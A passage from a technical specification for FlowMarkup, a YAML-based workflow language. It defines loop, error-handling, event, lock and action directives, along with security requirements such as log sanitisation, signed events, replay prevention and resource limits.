**Maximum iteration limit.** `while` and `repeat` loops MUST support a `maxIterations` property (default: 100,000) that limits the number of iterations. If the iteration count exceeds `maxIterations`, the engine MUST raise `ResourceLimitError`. Static analysis rule SA-LOOP-3 (WARN) MUST flag `while`/`repeat` loops where `maxIterations` is not explicitly set and the condition references user-controlled input. *(CWE-770: Allocation of Resources Without Limits or Throttling)*

### 3.5 `repeat`

Post-condition loop. When entered, body executes at least once before `until:` is evaluated. Supports optional `condition:` pre-execution guard — when false, the repeat step is not entered (body does not execute). Once entered, the body always executes at least once, then `until:` is checked after each iteration.

```yaml
- repeat:
    do:
      - call: { service: status, operation: check, result: { job_status: =RESULT.status } }
      - wait: 2s
    until: "=job_status == 'ready'"
```

| Key | Type | Required | Description |
|---|---|---|---|
| `do` | stepList | Yes | Loop body — executes at least once |
| `until` | CEL (boolean) | Yes | Exit condition — checked after each iteration |
| `timeout` | DURATION | No | Maximum total loop duration; raises `TimeoutError` if exceeded |
| `maxIterations` | integer | No | Maximum iteration count (default: 100,000). Raises `ResourceLimitError` if exceeded. |

### 3.6 `try`

At least one of `catch` or `finally` MUST be present. Supports optional `condition:` pre-execution guard — when false, the entire `try` (including `finally:`) is skipped.

```yaml
- try:
    do:
      - <step>
    catch:
      TimeoutError:
        - <step>
      ServiceError:
        condition: "=ERROR.MESSAGE.contains('transient')"
        do:
          - <step>
      default:
        - <step>
    finally:
      - <step>
```

`catch:` is a map. Keys matched in YAML key order; first match wins. `default` MUST be last.

> **Normative:** FlowMarkup requires YAML parsers that preserve mapping key insertion order. All FlowMarkup-compatible parsers MUST preserve insertion order for `catch:` maps, `switch.match:` maps, and any other context where key order determines evaluation semantics. Engines MUST validate at load time that their YAML parser preserves insertion order for mappings. If the parser does not preserve order, the engine MUST raise `ConfigurationError` at startup.

**YAML merge key (`<<`) restriction.** Engines MUST reject YAML documents containing the merge key (`<<`) syntax. SA-YAML-2 MUST reject at severity ERROR. Engines MUST NOT resolve merge keys as an alternative to rejection — resolution before validation risks merge keys overriding security-critical fields. The merge key can inject unexpected properties into mappings from anchored nodes, potentially overriding security-critical fields such as `requires`, `cap`, `integrity`, or `tls` settings. Flow definitions MUST NOT use the YAML merge key (`<<`) syntax. *(CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes)*

Catch clauses support an optional `condition:` guard. When a clause matches by error type but its `condition:` evaluates to false, the error **falls through** to the next matching clause. Clause form: `{ condition: <cel-expression>, do: [<steps>] }`. The `ERROR` binding is available in the condition.

Error context: `ERROR.TYPE`, `ERROR.MESSAGE`, `ERROR.STEP`, `ERROR.DATA.*`, `ERROR.CAUSE`.

**Auto-cause on rethrow:** `throw` inside `catch` automatically sets the new error's `cause` to the caught error.

### 3.7 `set`

Assign one or more variables. Keys are target variable names (never `=`-prefixed). Values follow the `=` prefix rule.

```yaml
- set:
    counter: 0
    status: pending
    GLOBAL.request_count: =GLOBAL.request_count + 1
```

Values MAY use the typed declaration form (`$kind`/`$value`).

#### `$readonly` in `set:`

A `set:` target can be marked `$readonly: true` to freeze a computed value mid-flow:

```yaml
- set:
    computed_threshold:
      $readonly: true
      $kind: NUMBER
      $value: =base_threshold * multiplier
```

**Copy semantics:** When assigning a readonly data element's value to another target, only the value is copied. The `$readonly` property does not propagate:

```yaml
# world is readonly
- set:
    hello: =world    # hello gets world's value but is NOT readonly
```

### 3.8 `log`

```yaml
- log: "Processing {{item.name}}"                    # shorthand, level: INFO
- log: { level: WARN, message: "Retrying" }          # full form
- log: { level: "=GLOBAL.verbose ? DEBUG : INFO", message: "..." }  # dynamic level
```

### 3.9 `logWarn` / `logError`

```yaml
- logWarn: "Overnight order {{order.id}} — expedited pipeline"
- logError: "Payment failed: {{ERROR.MESSAGE}}"
```

**Shorthand directives** — `logWarn: X` desugars to `log: { level: WARN, message: X }`. `logError: X` desugars to `log: { level: ERROR, message: X }`.

String form only — the value is a CEL expression or template string (same as `log:` string form). Step-level `condition:` and annotations (`_id_`, `_label_`, `_notes_`, `_meta_`) are supported as sibling keys. Use the full `log:` object form when you need dynamic level (`level: =expr`).

Why only WARN and ERROR: these are the only levels commonly set explicitly in flow definitions (INFO is the default for `log:`, DEBUG/TRACE are rare in production flows).

**Log sanitization.** The engine MUST sanitize all interpolated values in log output: (1) replace `\r` and `\n` with their escaped representations `\\r` and `\\n`, (2) strip ANSI escape sequences (bytes 0x1B-0x1F except `\t`), (3) for structured log formats (JSON), properly escape interpolated values as JSON strings. SA-LOG-1 (ERROR) flags template interpolation of user-controlled values (`input:` parameters, `EVENT.DATA.*`) in log messages without sanitization. *(CWE-117)*

### 3.10 `switch`

```yaml
- switch:
    value: =order.status
    match:
      rush:
        - log: "Rush order"
      standard:
        - set: { priority: normal }
    default:
      - log: "Unknown status"
```

`match:` keys MUST NOT start with `=` or contain `{{ }}`. Supports optional `condition:` pre-execution guard — when false, the switch is skipped entirely.

Match comparison uses **strict equality** — no type coercion. CEL follows standard CEL type semantics: cross-type `==` is always `false` (no implicit coercion). `1 == '1'` evaluates to `false`. `1 == 1.0` evaluates to `true` (numeric promotion only). YAML 1.2.2 key types are preserved: `1` (integer) does not match `"1"` (string); `true` (boolean) does not match `"true"` (string). YAML boolean coercion (YAML 1.1 `yes`/`no`/`on`/`off` → boolean) is not applicable because the spec mandates YAML 1.2.2 which does not auto-coerce these values. The evaluated `value:` result is compared as-is against each key. Comparison is case-sensitive for strings. Quote keys when string matching is intended (see §2.1).

When `switch.value` compares against security-sensitive values (e.g., API keys, tokens, capability names), the engine MUST use constant-time comparison to prevent timing side-channel attacks. Implementations MAY use platform-native constant-time comparison functions (e.g., `crypto.timingSafeEqual` in Node.js, `hmac.Equal` in Go).

### 3.11 `throw`

```yaml
- throw:
    error: ValidationError       # static type name
    message: "='Field ' + field_name + ' is required'"
    data:
      field: =field_name
```

**Auto-cause** when inside a `catch` block.

**Key naming:** `error:` in `throw:` identifies the error type to raise at runtime. `$kind:` in `throws:` declarations is a type-system metadata key used in the contract definition. The distinction mirrors the separation between runtime directives and declarative type metadata throughout the specification.

`throw` supports the standard `condition:` pre-execution guard (see section 4.1). When the condition evaluates to false, the throw is skipped entirely.

### 3.12 `assert`

```yaml
- assert: =result != null                    # shorthand
- assert:
    condition: =items.size() > 0
    message: "'Expected items, got ' + items.size()"
```

Throws `AssertionError` on false. Engines MUST NOT elide or skip `assert` evaluation in any mode — assertions are always enforced at runtime. Static analysis treats `assert` as a reachability hint.

### 3.13 `return`

Terminates the **entire flow instance**. `finally:` still runs. `return` inside `finally:` is a static analysis error.

Static analysis rule SA-FINALLY-1 (ERROR) MUST reject `return` inside `finally:` blocks. If encountered at runtime, the engine MUST raise `ConfigurationError`.

```yaml
- return: { result: =cached_value, status: from-cache }  # multi-value (explicit)
- return: { order_id:, status: fulfilled }                 # multi-value (null = same-name: order_id: → =order_id)
- return: [records_loaded, validation_status]               # list form (all same-name)
- return: =generated_image                                 # single-value
- return:                                                  # bare return
```

**Null-value shorthand:** In object form, `key:` (YAML null) → `key: =key` — passes the local variable with the same name. **List form:** `return: [a, b, c]` → `{a: =a, b: =b, c: =c}`. Mixed object form allows null-value and explicit-value keys together.

In parallel context, `return` cancels all branches and terminates the entire flow.

### 3.14 `yield`

Produces a value without terminating. Requires `yields:` declaration (SA-YIELD-7).

```yaml
- yield: =token                  # single-value
- yield: { text: =chunk, index: =i }  # multi-value
- yield:                         # bare: null heartbeat
```

**Context restrictions:**
- Forbidden in `onTimeout:` (SA-YIELD-5), `lock` bodies (SA-YIELD-6), RACE branches (SA-YIELD-10)
- Discouraged in `finally:` (SA-YIELD-1 warning)
- Inside `transaction: true`, yields are buffered until commit (SA-YIELD-12). On rollback, buffered yields are discarded. `yield` inside a `rollback:` handler is a static analysis error (SA-YIELD-21)

#### YIELD binding and `onYield:` semantics

The `YIELD` built-in binding is available inside `onYield.do:` blocks. Its shape depends on the yielding flow's `yields:` declaration:

- **Single-value** (`yields: { $kind: TEXT }`): `YIELD.VALUE` is the yielded value directly (e.g., a string). `YIELD.INDEX` is the 0-based sequential integer index of this yield within the current execution.
- **Multi-param** (`yields: { params: { text: ..., index: ... } }`): `YIELD.VALUE` is a map with the declared param keys (e.g., `YIELD.VALUE.text`, `YIELD.VALUE.index`).

**`as:` interaction:** When `onYield:` specifies `as: name` (e.g., `as: token`), the named variable replaces `YIELD.VALUE` — i.e., `token` and `YIELD.VALUE` refer to the same value. `YIELD.INDEX` remains accessible regardless of `as:`.

**`YIELD.INDEX` guarantees:** 0-based integer, monotonically increasing, sequential (no gaps). Available in both `onYield.do:` and `FORWARD` modes (in FORWARD mode, the index is passed through to the caller's `onYield:` handler).

#### `onYield:` applicability by action type

`onYield:` is available on actions that support streaming output:

| Action | Streaming support | Notes |
|--------|------------------|-------|
| `call` | Yes | When the service produces streaming output |
| `run` | Yes | When the sub-flow declares `yields:` |
| `exec` | Yes | Streams stdout |
| `ssh` | Yes | Streams stdout |
| `request` | Yes | SSE and chunked HTTP responses |
| `mail` | No | Does not produce streaming output |
| `storage` | No | Does not produce streaming output |

### 3.15 `wait`

Duration-based pause.

```yaml
- wait: 5s           # duration literal
- wait: 500          # integer milliseconds
- wait: =computed    # CEL expression
```

**Object form** with optional `condition:` guard:

```yaml
- wait:
    condition: =poll_result != 'confirmed'    # skip wait if false
    duration: 5s
```

| Key | Type | Description |
|---|---|---|
| `duration` | DURATION / INTEGER / CEL | How long to pause (same values as shorthand form) |
| `condition` | CEL (boolean) | Pre-execution guard — wait is skipped if false |
| `maxDuration` | DURATION | Maximum wait duration. Default: `24h`. Computed durations exceeding `maxDuration` raise `ResourceLimitError` at runtime. Literal durations exceeding `maxDuration` raise `ValidationError` at load time. Engine configurable maximum: `30d`. |

**Checkpoint resume:** The engine stores the target resume timestamp. On checkpoint recovery, if the target time has already passed, the `wait` completes immediately. Otherwise, the engine waits for the remaining duration.

**Duration bounds.** The engine MUST enforce a configurable maximum wait duration (default: 24 hours, configurable maximum: 30 days). SA-WAIT-1 (WARN) flags `wait` with CEL-derived duration (`wait: =computed`) and no `maxDuration` or `timeout:` constraint on the enclosing step or group. *(CWE-770)*

### 3.16 `waitUntil`

Timestamp-based pause. Past timestamps complete immediately. Supports optional `condition:` pre-execution guard — when false, the step is skipped entirely.

```yaml
- waitUntil: "2026-03-08T09:00:00Z"
- waitUntil: =expiration_date
```

**Object form** with optional `timeout:`:

```yaml
- waitUntil:
    timestamp: =scheduled_at          # the target timestamp
    timeout: 24h                       # max wait duration — raises TimeoutError if exceeded
```

| Key | Type | Description |
|---|---|---|
| `timestamp` | STRING (ISO 8601) / CEL | Target timestamp to wait until |
| `timeout` | DURATION | Maximum wait duration; raises `TimeoutError` if exceeded |

Format: ISO 8601 with timezone. `null` or invalid -> `ValidationError`.

### 3.17 `break`

Exit innermost loop. Static analysis error if outside a loop. Forbidden in `finally:`.

```yaml
- break:
- break: { condition: =job_status == 'completed' }
```

### 3.18 `continue`

Skip to next iteration. Same scoping rules as `break`.

> **Concurrent `forEach`:** `break` and `continue` are forbidden inside concurrent `forEach` iterations. Use `completionCondition` for controlled early termination of concurrent loops. SA-CTRL-10 (ERROR) enforces this restriction.

### 3.19 `emit`

Fire an event.

```yaml
- emit: order_ready                              # shorthand
- emit:
    event: payment_received                      # static event type
    scope: CONTEXT                               # LOCAL (default) | CONTEXT | GLOBAL
    data: { order_id: =order.id }
```

Events are buffered per scope. Buffer size is engine-configurable (default: 1024 events per scope). The engine MUST enforce per-flow-instance event emit quotas to prevent a single flow from exhausting shared event buffers (default: 256 events per scope per flow instance). Quota resets per flow invocation. The per-flow-instance emit quota consumed inside rolled-back transaction groups MUST be refunded — the event counter MUST be decremented when buffered events are discarded on rollback. This prevents denial-of-service via repeated emit-then-rollback loops. Buffer full or quota exceeded raises `EventBufferFullError` (retryable). SA-EMIT-5 warns when a flow emits events in an unbounded loop without rate limiting. `emit.event` is a static identifier, not CEL. SA-EVENT rules apply.

**Default scope.** `emit.scope` defaults to `LOCAL`. Emitted events are delivered only within the current flow instance scope unless an explicit `scope:` is specified.

### 3.20 `waitFor`

Block until event received.

```yaml
- waitFor: order_ready                            # shorthand
- waitFor:
    event: payment_received
    scope: GLOBAL
    timeout: 30m
    condition: =EVENT.DATA.order_id == expected_id  # post-receive filter
    capture:
      paid_order_id: =EVENT.DATA.order_id
```

`condition:` is a **post-receive filter**, not a pre-execution guard. When the condition evaluates to false, the event is discarded and the step continues waiting for the next matching event. Capture binds `EVENT.DATA` fields to flow variables after the condition check.

**Default scope.** `waitFor.scope` defaults to `LOCAL`. Events are only received from the matching scope. A `waitFor` without explicit `scope:` only receives events emitted with `scope: LOCAL` (or default scope) within the same flow instance.

**GLOBAL event source verification.** Events with `scope: GLOBAL` MUST include a cryptographically verified source identifier. Engines MUST reject GLOBAL events that lack source authentication. The source authentication mechanism MUST use HMAC-SHA256 or digital signatures — bearer tokens alone are insufficient for GLOBAL event source authentication. The engine MUST stamp each event with an immutable `EVENT.SOURCE` identity containing the emitting flow's fully-qualified identifier, tenant ID, and instance ID. The `EVENT.SOURCE` MUST be cryptographically signed by the emitting engine instance using HMAC-SHA256 (with a per-tenant key) or a digital signature (with a per-engine key). Receiving engines MUST verify the signature before delivering the event to a `waitFor` listener. The `waitFor` directive MUST support a `source:` filter to restrict which flow identities are accepted. When `source:` is not specified on a `waitFor` with scope GLOBAL, static analysis rule SA-EVENT-11 MUST emit an ERROR indicating the listener accepts events from any flow instance, which may enable cross-tenant or cross-flow event spoofing. *(CWE-345: Insufficient Verification of Data Authenticity)*

**GLOBAL event signature format.** The `EVENT.SOURCE` structure for GLOBAL events MUST contain:
```
{
  flow_id:      string,   // fully-qualified flow identifier
  tenant_id:    string,   // emitting tenant
  instance_id:  string,   // emitting flow instance
  engine_id:    string,   // emitting engine instance
  timestamp:    string,   // ISO 8601 with millisecond precision
  nonce:        string,   // UUID v4 — unique per event, prevents replay attacks
  signature:    string    // Base64-encoded HMAC-SHA256 or digital signature
}
```
The signature MUST cover the concatenation of `flow_id`, `tenant_id`, `instance_id`, `engine_id`, `timestamp`, `nonce`, `EVENT.TYPE`, and a SHA-256 digest of `EVENT.DATA` (canonicalised as JSON with sorted keys, no whitespace). When HMAC-SHA256 is used, the key MUST be a per-tenant secret managed through the engine's secret provider — it MUST NOT be hardcoded or derived from publicly visible identifiers. When digital signatures are used, the signing key MUST be a per-engine private key with the corresponding public key distributed through the engine's key management facility.

**Signature verification failure handling.** When signature verification fails, the engine MUST: (1) reject the event — it MUST NOT be delivered to any `waitFor` listener; (2) emit an audit log entry at ERROR level containing the event type, claimed source, reason for rejection, and the receiving engine's identity; (3) increment a `global_event_signature_failures` metric counter. Engines MUST support key rotation by accepting signatures from both the current and immediately previous key during a configurable grace period (default: 1 hour, max: 24 hours). SA-EVENT-15 (ERROR) MUST flag GLOBAL event emission in flows that lack access to the tenant signing key.

**Replay prevention.** Receiving engines MUST maintain a nonce cache (minimum retention: key rotation grace period + 5 minutes) and reject events with duplicate nonces. Receiving engines MUST reject events with `timestamp` older than a configurable maximum age (default: 5 minutes). *(CWE-294: Authentication Bypass by Capture-replay)*

**`capture:` shorthand forms** (aligned with `result:` which supports the same patterns):

```yaml
# Null-value form: null value → =EVENT.DATA.<name>
capture:
  decision:              # → =EVENT.DATA.decision
  approver:              # → =EVENT.DATA.approver

# List form: each name receives EVENT.DATA.<name>
capture: [decision, approver]

# Object form (explicit mapping)
capture:
  local_name: =EVENT.DATA.remote_name
```

### 3.21 `lock`

Mutual exclusion group.

```yaml
- lock:
    name: 'account_balance'     # CEL expression
    mode: EXCLUSIVE             # EXCLUSIVE (default) | SHARED
    scope: GLOBAL
    timeout: 5s
    do:
      - set: { GLOBAL.account_balance: "=GLOBAL.account_balance - amount" }
```

**Default scope.** `lock.scope` defaults to `LOCAL`. A lock without explicit `scope:` provides mutual exclusion only within the current flow instance. For cross-instance mutual exclusion, specify `scope: GLOBAL` explicitly.

**EXCLUSIVE:** Single holder. `GLOBAL.*`/`CONTEXT.*` writes buffered and committed atomically. `LOCAL.*` writes immediate.

**SHARED:** Multiple concurrent readers. Consistent snapshot for duration.

Lock acquisition timeout raises `TimeoutError`. The engine MUST enforce a maximum lock wait timeout (default: 5 minutes, configurable per-tenant). Locks without explicit `timeout:` use the engine default. This prevents indefinite blocking from contended locks. Supports optional `condition:` pre-execution guard — when false, the lock body is skipped entirely.

**Reentrant:** Nested lock with same name+scope within the same flow execution context is a no-op. Sub-flows invoked synchronously inherit the caller's lock context. `async: true` sub-flows start a new lock context.

Static analysis: SA-LOCK and SA-CONC rules apply.

**Lock name validation.** Lock names MUST be validated against a pattern of `[a-zA-Z0-9_.-]{1,256}` to prevent injection attacks. Lock names MUST be automatically namespaced by flow ID or tenant ID to prevent cross-flow lock interference. Engines MUST NOT allow lock names derived from user input without sanitization. When lock names are derived from CEL expressions referencing user input, the engine MUST validate the computed name against the pattern `^[a-zA-Z0-9_.-]{1,256}$` and reject non-conforming names with a `ValidationError`. The engine MUST automatically prepend a namespace prefix (format: `<tenant_id>/<flow_id>/`) to all lock names before registry operations, ensuring that locks from different flows or tenants cannot collide or interfere with each other. This prevents lock-name pollution attacks where an adversary creates many uniquely-named locks to exhaust the engine's lock registry. Static analysis rule SA-LOCK-10 MUST flag CEL-derived lock names that incorporate user-controlled input. *(CWE-400: Uncontrolled Resource Consumption)*

**Lock registry limits:** The engine MUST enforce a configurable maximum lock registry size **per tenant** (default: 10,000). When exceeded, the engine raises `ResourceExhaustedError`. Dynamic lock names (CEL expressions) risk unbounded registry growth — SA-LOCK-8 warns on dynamic lock names. Prefer static lock names or bounded sets derived from enum values. **Per-flow lock limit:** The engine MUST enforce a configurable maximum lock count per flow definition (default: 100, maximum: 10,000). This prevents a single flow from monopolizing the tenant's lock budget. **Lock lifecycle:** Locks acquired within a flow instance MUST be released when the flow instance completes (success, error, or cancellation). The engine MUST implement a lock TTL (default: 1 hour, configurable per-tenant) after which unreleased locks are automatically reclaimed. **Orphaned lock detection:** Orphaned lock detection MUST be implemented. Engines MUST detect locks held by terminated or crashed flow instances and release them within a configurable detection interval (default: 30 seconds, maximum: lock TTL). The engine SHOULD implement lock starvation prevention (e.g., fair queuing) to prevent SHARED locks from indefinitely starving EXCLUSIVE lock waiters.

> **Cross-instance deadlock detection.** The engine MUST implement cross-instance deadlock detection via wait-for graph analysis. When a cycle is detected in the global lock wait-for graph, the engine MUST immediately raise `DeadlockError` on the newest waiter rather than waiting for lock timeout. *(CWE-833)*

### 3.22 `cancel`

Cancels a sub-flow instance referenced by a FlowHandle.

```yaml
# Shorthand form
- cancel: =payment_proc

# Full form with optional condition
- cancel:
    handle: =payment_proc
    condition: =elapsed > timeout
```

**Semantics:**
- Sends cancellation signal to the referenced sub-flow instance.
- Sub-flow's `finally:` still runs (graceful cancellation).
- If already completed/cancelled, no-op (not an error).
- Non-blocking — returns immediately.
- Only valid for sub-flows started with `handle:` on a `run:` step.

**Why a directive, not a CEL method:** CEL is designed to be side-effect-free. `cancel` is a control flow operation with external effects. Making it a directive (like `emit`, `log`, `wait`) keeps CEL pure.

Static analysis: SA-CANCEL-1 (ERROR) rejects `cancel:` referencing an identifier that is not a FlowHandle. SA-HANDLE-4 (WARN) warns when cancelling a synchronous (non-async) `run:` step handle.

---

## 4. Actions

### 4.1 Universal Shape

```yaml
- <action-name>:
    _label_: "Human-readable"
    _id_: step_name
    _notes_: "..."
    _meta_: {}
    condition: "<cel-expression>"
    timeout: duration|integer|CEL
    onTimeout:
      after: duration
      do: [ <step> ]
    retry: "3/2s/EXPONENTIAL"    # string shorthand: maxAttempts[/delay[/backoff]]
    # OR object form:
    # retry:
    #   maxAttempts: integer
    #   delay: duration|integer|CEL
    #   backoff: FIXED|LINEAR|EXPONENTIAL
    #   maxDelay: duration|integer|CEL
    #   jitter: true              # true=25%, false=none, number 0.0-1.0, or "25%"
    #   onErrors: [ErrorType]          # retryable whitelist
    #   nonRetryable: [ErrorType]    # (mutually exclusive with onErrors)
    rateLimit:
      invocations: integer|CEL
      per: duration|integer|CEL
      strategy: WAIT|REJECT
      scope: LOCAL|CONTEXT|GLOBAL
      key: "<cel-expression>"
      timeout: duration|integer|CEL
    circuitBreaker:                           # "threshold/name" | integer | =CEL | object
      name: '<cel-expression>'
      threshold: integer|CEL
      window: duration|integer|CEL
      resetTimeout: duration|integer|CEL
      halfOpenAttempts: integer|CEL
      scope: LOCAL|CONTEXT|GLOBAL
      errors: [ErrorType]
      nonCountable: [ErrorType]
    async: false
    params: { key: =expr, ... } | { key:, ... } | [key1, key2]
    result: variable_name | { target: =RESULT.source, $yields: var } | [key1, key2]
    onYield: { do: [...] } | FORWARD
    errors: [ErrorType]          # declared error types the action may throw
    rollback: [ <step> ]
    catch:
      ErrorType:
        - <step>
      default:
        - <step>
```

**Execution order:** `circuitBreaker -> rateLimit -> retry -> timeout -> action execution`

**`catch:`** -- per-step inline error handler (desugars to `try:/catch:`). Mutually exclusive with `rollback:` (SA-ERR-7). Not available on `async: true` (SA-ERR-6).

> **`catch:` + `rollback:` pattern:** When a step needs both error handling (on failure) and compensation (on success followed by later failure), wrap the step in `try:/catch:` and place `rollback:` on the `try:` block. The `catch:` handles immediate failures; the `rollback:` registers compensation for the success path.

**Retry jitter:** `true` = 25%, `0.25` = 25%, `"25%"` = 25%. `EXPONENTIAL` defaults to `jitter: true`; others default to `false`. The jitter formula is: `actual_delay = calculated_delay × (1 + uniform_random(-jitter, +jitter))` where `jitter` is the fractional value (e.g., 0.25 for 25%) and `uniform_random` produces a uniformly distributed value in the specified range. For example, with a 2s calculated delay and 25% jitter, the actual delay is uniformly distributed in [1.5s, 2.5s]. Engines MUST use a cryptographically secure or high-quality PRNG for jitter randomness — `Math.random()` or equivalent non-seeded PRNGs are acceptable for jitter (this is not a security-sensitive random value). For testing, engines MUST support a `retry.jitter.seed` configuration option that fixes the PRNG seed, producing deterministic jitter sequences for reproducible test scenarios.

**Retry string shorthand:** `retry: "3/2s/EXPONENTIAL"` — grammar: `<maxAttempts>[/<delay>[/<backoff>]]`. Examples: `retry: 3`, `retry: "3/2s"`, `retry: "5/500ms/EXPONENTIAL"`, `retry: "3/1s/LINEAR"`. Advanced options (`onErrors`, `nonRetryable`, `maxDelay`, `jitter`) require object form. Follows the same precedent as `rateLimit: "100/1m"` / `"100/1m/GLOBAL"`.

**`async: true`** -- fire-and-forget. Errors logged but not propagated to the parent flow's `catch:` handlers — the parent flow continues unaware. Security errors (`MissingCapabilityError`, `SecretAccessError`, `AuthenticationError`, `AccessDeniedError`) are NOT propagated either, but are escalated to the audit log unconditionally ([FLOWMARKUP-ENGINE.md](FLOWMARKUP-ENGINE.md) §5.7). SA-RUN-18 (WARN) flags `async: true` on steps that invoke sub-flows with security-sensitive capabilities (`SECRET`, `EXEC`, `MAIL`, `REQUEST`, `STORAGE`, or `SSH`) — security violations in fire-and-forget steps are invisible to the caller. SA-RUN-20 (WARN) flags `async: true` sub-flows that write to `GLOBAL.*` keys also written by the parent or sibling async sub-flows — concurrent writes have no ordering guarantee (last writer wins).

**Retryable vs non-retryable errors:**

| Category | Error types | Retry? |
|---|---|---|
| Transient infrastructure | `TimeoutError`, `ConnectionError`, `TLSError` | Yes |
| Rate limiting | `RateLimitError` | Yes |
| Event buffer full | `EventBufferFullError` | Yes |
| Transient service | `ServiceUnavailableError`, `ServiceError` | Yes |
| HTTP server error | `HttpError` (5xx status) | Yes |
| HTTP client error | `HttpError` (4xx status) | No |
| Optimistic conflict | `ConflictError` | No (see note) |
| Bad input | `ValidationError`, `BadRequestError` | No |
| Authentication | `AuthenticationError` | No |
| Access denied | `AccessDeniedError` | No |
| Missing capability | `MissingCapabilityError` | No |
| Not found | `NotFoundError` | No |
| Configuration | `ConfigurationError` | No |
| Assertion | `AssertionError` | No |
| Business logic | application-specific | No |
| Rollback result | `RolledBackError`, `RollbackFailedError` | No |
| Circuit open | `CircuitOpenError` | No |
| Recursion overflow | `StackOverflowError` | No |
| Group failure | `GroupError` | No |

> **`HttpError` retryability:** `HttpError` retryability depends on HTTP status code. 5xx (server errors) are transient and retryable. 4xx (client errors) indicate bad input and are non-retryable. The retry middleware MUST inspect `ERROR.DATA.status` to determine retryability.

> **`ConflictError` note:** `ConflictError` from optimistic locking is non-retryable by default because the flow author must decide whether to re-read state before retrying. Automatic retry without re-reading the resource would repeat the same conflict. To implement OCC retry, use `catch: { ConflictError: [...] }` with explicit re-read and retry logic.

**`GroupError`** -- raised by `group` with `failPolicy: COMPLETE` when one or more branches fail. Properties: `ERROR.DATA.failures` (list of per-branch error summaries, each with `branch`, `type`, `message`), `ERROR.DATA.succeeded` (list of branch names that completed successfully).

### 4.2 Rate Limiting

**String shorthand:** `rateLimit: 100/1m` or `rateLimit: 100/1m/GLOBAL`. The optional third segment specifies scope (LOCAL, CONTEXT, GLOBAL). Advanced fields (`strategy`, `key`, `timeout`) still require object form.

**Object form:** `invocations`, `per`, `strategy` (WAIT|REJECT), `scope`, `key`, `timeout`.

Scope defaults: flow-level -> GLOBAL, action-level -> LOCAL. Rate limit scope is determined by the flow definition and MUST NOT be downgraded by capability restrictions. If the flow declares `rateLimit: { scope: GLOBAL }`, all instances share the global counter regardless of `cap:` restrictions.

### 4.3 Circuit Breaking

**State machine:** CLOSED -> (threshold reached) -> OPEN -> (resetTimeout expires) -> HALF_OPEN -> (trials succeed) -> CLOSED.

**OPEN:** Rejects with `CircuitOpenError`. No execution, no rateLimit token consumed, no retry, no rollback registration.

**`CircuitOpenError`** -- non-retryable. Properties: `ERROR.DATA.name`, `scope`, `failures`, `opened_at`, `reset_at`.

`ConflictError` and `DeadlockError` are always excluded from failure counting.

Scope defaults: flow-level -> GLOBAL, action-level -> LOCAL.

Static analysis: SA-CB rules apply.

**Circuit breaker string shorthand:** `circuitBreaker: "5/payment_api"` — grammar: `<threshold>/<name>`. Examples: `circuitBreaker: "5/payment_api"`, `circuitBreaker: "10/inventory"`. The name must be a static literal (no `=` prefix); `/` is not allowed in the name segment. Advanced options (`window`, `resetTimeout`, `halfOpenAttempts`, `scope`, `errors`, `nonCountable`) require object form. Follows the same precedent as `retry: "3/2s/EXPONENTIAL"` and `rateLimit: "100/1m"` — primary numeric value first.

**Circuit breaker integer shorthand:** `circuitBreaker: 5` — bare integer treated as threshold. The circuit breaker name is auto-derived from the step's `_id_`. SA-CB-13 (ERROR) rejects integer shorthand on steps without `_id_`. All other fields use defaults (`window: 1m`, `resetTimeout: 30s`, `halfOpenAttempts: 3`).

**Circuit breaker shorthand in `defaults:`:** Neither integer nor string shorthand is valid in `defaults.circuitBreaker`. Integer form has no step context for `_id_` derivation; string shorthand would assign a single name to all descendant steps, causing unintended sharing (see SA-DEF-1). SA-DEF-5 (ERROR) rejects shorthand forms in defaults. Use object form or a CEL reference (`=MY_BREAKER` from `const:`) in defaults.

**Circuit breaker registry limits:** The engine MUST enforce the same per-tenant registry limit (default: 10,000) and per-flow limit (default: 100) for circuit breaker names as for lock names. Dynamic circuit breaker names from CEL expressions risk unbounded registry growth — SA-CB-12 (WARN) warns on dynamic circuit breaker names.

### 4.4 Idempotency Key

```yaml
idempotencyKey: "='payment:' + order_id + ':' + amount"
```

Evaluated at invocation time (before `vars:`/`const:`). Only `ENV.*`, `SECRET.*`, `GLOBAL.*`, `CONTEXT.*`, and flow `input` in scope. `DuplicateInvocationError` (non-retryable) on duplicate. SA-IDEMP-1 (ERROR) rejects non-deterministic functions in idempotency keys.

Idempotency keys MUST be deterministic. Using non-deterministic functions (`uuid()`, `random()`, `now()`) defeats deduplication entirely — each retry generates a new key, causing duplicate side effects.

Correct: `idempotencyKey: =input.order_id + "-" + input.item_id`
Wrong:   `idempotencyKey: =uuid()`

SA-IDEMP-1 (ERROR) rejects non-deterministic idempotency key expressions.

**Idempotency semantics:** The engine MUST implement idempotency key checks using atomic compare-and-set (CAS) against a durable store. The check MUST complete before any action execution begins — `DuplicateInvocationError` MUST be raised before side effects. The engine MUST enforce a configurable dedup window (default: 24 hours, minimum: 1 minute, maximum: 30 days). Keys older than the window are eligible for eviction. The engine SHOULD provide a management API to inspect and clear idempotency keys.

### 4.5 Step I/O -- params and result

**`params:`** -- Three forms: (1) Object: `params: { key: =expr, other: literal }` — keys are parameter names, values are CEL expressions, literals, or null. Null value uses same-name convention: `key:` (null) passes local variable `=key`. (2) List: `params: [a, b, c]` — each name passes the local variable with the same name. Equivalent to `{a: =a, b: =b, c: =c}`. (3) Mixed: object form with null-value and explicit-value keys together. Only on `call`/`run`.

Static analysis rule SA-PARAM-5 (WARN) MUST flag null-value shorthand (`params: { key: }`) when the matching local variable has not been explicitly assigned in the current scope.

**`result:`** -- object form (target: =source) or string form (single variable name). Object-form values MUST start with `=`. `$yields:` captures materialized yield list.

**List form edge case:** In `result: [key1, key2]`, if a listed key is not present in `RESULT`, the variable is set to `null`. SA-RESULT-4 (warn) flags list-form keys not in the action's declared output.

Action providers MAY declare `sensitive: true` on output fields that contain credential material. When `sensitive: true` is declared, the engine automatically applies `$exportable: false` to the receiving flow variable. Flow authors who need `$secret: true` opacity MUST explicitly annotate.

Example:
```yaml
output:
  params:
    access_token:
      type: STRING
      sensitive: true
    refresh_token:
      type: STRING
      sensitive: true
    expires_in:
      type: INTEGER
```

### 4.6 Default Actions

#### `call` -- Service Invocation

Invokes a named service operation. `service:` and `operation:` are REQUIRED.

**`service:`** -- bare alias (`service: db` -> `SERVICES.db`) or CEL expression (`service: =SERVICES.db`).

**`operation:`** -- bare name or CEL expression. Must match `^[a-zA-Z_][a-zA-Z0-9_]*$`.

```yaml
- call:
    service: db
    operation: query
    params:
      sql: 'SELECT * FROM users WHERE email = ?'
      params: [=user_email]
